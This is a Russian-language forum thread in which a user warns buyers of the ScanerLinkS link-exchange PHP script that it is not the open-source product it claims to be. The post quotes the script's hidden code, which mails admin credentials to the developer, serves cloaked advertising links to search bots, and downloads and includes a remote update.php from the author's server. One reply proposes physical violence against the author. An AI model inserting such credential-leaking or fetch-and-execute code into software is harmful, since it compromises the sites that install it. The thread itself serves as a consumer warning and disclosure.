Скрипт обмена ссылками scanerlink, Обман (введение в заблуждение) автора

Статус
В этой теме нельзя размещать новые ответы.

Jerry

тот самый Учиха
Регистрация
16 Апр 2006
Сообщения
1.226
Реакции
514
Как то сделав очередно сайт, поленился писать свой соответствующий скрипт для обмена ссылками (немаловажная деталь в продвижении ресурса). Имеющийся на данный момент меня не устравал. Решил купить. Порыскав по интернету наткнулся на сканерлинк. Почитал ФАК, возможности скрипта - всё устаивало. в особенности это: "Открытый PHP код!". В титлах сайта (добавьте ru к топику темы - увидите сами).
------
<meta name="Title" content="ScanerLinkS - скачать ОТКРЫТЫЙ Скрипт Oбмена ссылками :: www scanerlink ru">
И
<title>ScanerLinkS - скачать ОТКРЫТЫЙ Скрипт Oбмена ссылками :: www scanerlink ru</title>
------

Вобщем автор лжёт код там не открытый. Применена "защита" нулевыми байтами в некоторых файлах (кажется в трёх, обнаружив это запустил парсер он у меня её и снял).

Ещё, в скрипте есть такие строчки:
------

$header = "From: ScanerLinkS <not-reply@scanerlink.ru>";
$header .= "\nContent-Type: text/plain; charset=windows-1251\n";
$header .= "X-Mailer: RoboGeneric\n";
$header .= "Return-Path: not-reply@scanerlink.ru\n";

# include("codes/config.php");

$w1=(Login);
$w2=(Pass);
$mail_congrat = <<<End
Здравствуйте!

Поздравляем Вас с успешной установкой каталога для
обмена ссылками ScanerLink! Надеемся, что данный
скрипт поможет Вам в нелегком труде раскрутки сайта.

Просим сообщать нам о всех неточностях в работе Вашего
каталога. Это поможет нам оперативно устранить
неисправность работы скрипта и выпустить обновленную версию.

Ваши данные для доступа в админ-панель:

Сайт: $myhost
Логин: $w1
Пароль: $w2

Спасибо за Ваш выбор!


Команда разработчиков ScanerLinkS.
http ScanerLink .ru / (в этой строке чуть редактнул УРЛ)
End;
------
Т.е. ВАШИ пароли, уважаемые пользователи скрипта, отсылаются автору.
И любые письма, то же попадают к автору.
Обратите внимание:
$header .= "Return-Path: not-reply@scanerlink.ru\n";
-------
В соседнем топике Sergey (HL) автор сего чуда развода бахвалился своей базой вебмастеров. Становиться понятно, откуда она у него.
Для просмотра ссылки Войди или Зарегистрируйся

Хотя, на сайте автора (в /faq.php) написано обратное, дескать:
---- (в самом низу) ---
Q: Передает ли скрипт какую-либо информацию с моего сервера разработчику? A: Скрипт не закодирован - смотрите сами
----
Опять же, намёк на "открытые исходники" (ложь) + ещё одна ложь.
Ещё:
Ограничено время работы скрипта
<?php (time()>1993456000)?exit('Script Expired':('';
Т.е. через некоторое время он попросту перестанет работать.
Ещё:
------------
if($versd != "30.08.041")
{
$err_msg = "<br><li style='color:red'>КАТАЛОГ РАБОТАЕТ С ОШИБКАМИ !<br>СООБЩИТЕ, ПОЖАЛУЙСТА, АДМИНИСТРАТОРУ (e-mail <a href=mailto:".my_data(my_email).">".my_data(my_email)."</a>), ЧТО НЕОБХОДИМО СДЕЛАТЬ ПОЛНОЕ ОБНОВЛЕНИЕ ВЕРСИИ СКРИПТА !";
}
------
Причём, эта строка выдаётся юзеру, заходящему в ваш каталог, а вы даже об этом и не знаете. Наверное это сделано, чтобы постоянно быть привязанным к автору скрипта, наверняка он денег прости, за устраниение этой "неполадки". Крохобор
--------
Ещё, по всему коду щедро рассыпаны проверки на запуск скрипта "локально" примерно такого вида:
-----
if($ip_a!='127.0.0.1')
{
$mess_to_user .= "\n\n=============================================\nВаш ресурс проверен в автоматическом режиме\nплатным скриптом обмена ссылками ScanerLinkS http scanerlink ru /\n";
}
------
А как вам нравиться вот это:
-------------
...
else if(getenv("REMOTE_ADDR")!='127.0.0.1')
{
$fp = @fsockopen("scanerlink.ru", 80, $errno, $errstr, 30);
if ($fp)
{
if((substr($useragent, 0, 12) == "StackRambler") or (substr($useragent, 0, 9) == "Googlebot") or (substr($useragent, 0, 6) == "Yandex") or (substr($useragent, 0, 5) == "Aport") or (substr($useragent, 0, 6) == "msnbot"))
{
$posagent = 1;
}
$recsl = 'http://scanerlink.ru/scanerlink/reclama.php?posagent='.$posagent;
$recslp = file_get_contents($recsl);
$post_link = $recslp;
fclose($fp);
}
...
--------
ПРЯМОЕ НАРУШЕНИЕ ЛИЦЕНЗИИ Я и других поисковиков. Технология клоакинг называется. Хитропопый Автор за Ваш счёт (за счёт ваших ресурсов) рекламит свои (а возможно и чужие) ресурсы. Т.е. если заходит юзер (или вы) - рекламных ссылок нет, а при заходе поисковика скрипт выдаёт рекламную ссылку.
За подобную ерунду сайты по первому стуку конкуренто вылетают из поиска.
Уважаемые пользователи сканерлинка:
Ваш сайт ещё не забанен? Или забанен, но вы не знаете причины???

------ Загрузка чего угодно на ваш сайт (троянов???) -------
if(getenv("REMOTE_ADDR")!='127.0.0.1')
{
$fp = @fsockopen("scanerlink.ru", 80, $errno, $errstr, 10);
if ($fp)
{
$fldl = "http://scanerlink.ru/scanerlink/updates/".$myhost.".upd";
$file_array = @file($fldl);
if($file_array)
{
copy($fldl,"update.php");
include("update.php");
}
fclose($fp);
}
}
################
}
------------------
В последнее время участились взломы сайтов, не в том ли одна из причин?

Вобщем там много всего. Это всё выявлено при поверхностном изучении.
И при чём тут заявление автора о:
------

QUOTE Там есть смешные темы от блондинок, мы их рассматриваем, и увы, удалить ни как не можем. А вы чего боитесь?
Если вы серьёзно пострадали, то плиз - арбитраж вебмани.
Мы рассмоштрим ваши убытки и предложим коспенсчацию ещё до решения арбитража. Если конечно вы не кидала, высасывающий из пальца.
А бодягу и словоблудство разводить это вам плиз на те форумы, где я не отвечаю.
И

QUOTE Чего только стоило заявлен6ие о спаме по клиентской базе. Там 200 чел, а по одному линкообменнику у меня 15 тыс чел, а по другому 20 тыс чел.
И Я ЭТО НЕ ПРОДАЮ ДЛЯ СВОИХ РАССЫЛОК (только предустановка базы на скрипт - покупать у меня не советую, проспамить сложно). А сам шлю едва ли не раз в квартал. Больше слать не чего. А полтом граждане грозяться в арбитраж вебмани подать, потому что к им не пришёл _бесплатный_ патч.
------
Посмотрите внимательно мои сообщения, и его. Думаю понятно станет, кто такой автор. Это он явно сам придумал. Прежде чем что то поставить из _купленного_ в инете начинаю изучать скурпулёзно. Этот скрипт по понятным причинам даже и не ставил.
 
Блин Jerry, спасибо просветил, а то я собирался покупать это скрипт.
Я предлагаю собраться и набить автору скипта морду! Или как нибудь ему по другому насрать.
 
Огромное спасибо за инфу, тоже рассмтривал этот скрипт для определенных целей.
Насчет идеи кары автору поддерживаю.
Можно парсить поисковики на предмет scanerlinka и уведомить админов, пусть бабки потребуют назад:)
 
Спасибо что просветил я собирался купить этот скрипт с базой сайтов для создания каталогов.
 
Спасибо!

А что можете посоветовать вместо? Есть CNCat, но уж больно он дорогой.
 
А есть какая-нибудь реально свободная от всех авторских троянских примочек версия ScanerLinkS???
А то почитал пост Для просмотра ссылки Войди или Зарегистрируйся и очень все это смущает...
Ведь по функционалу скриптик замечательный.
 
Откатал в арбитраж, посмотрим.
 
Выбирал себе на сайт из нескольких русскоязычных каталогов ScannerLinks, Linker 3.0, VettonLink, Linkexchanger 2. После долгого и тщательного теоретического анализа кода и redme был выбран Linexchanger 2. Пока нормально работает, не требует мускула. Слышал автор ScannerLinks, планирует новую версию своего каталога под Зендом.
 
Scanerlink -- это украденный Vetton Links Directory 2.7.4, в который добавили разного spyware. Пользуйтесь либо Vetton'ом (phpcode.ru) или LinkExchanger'ом.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху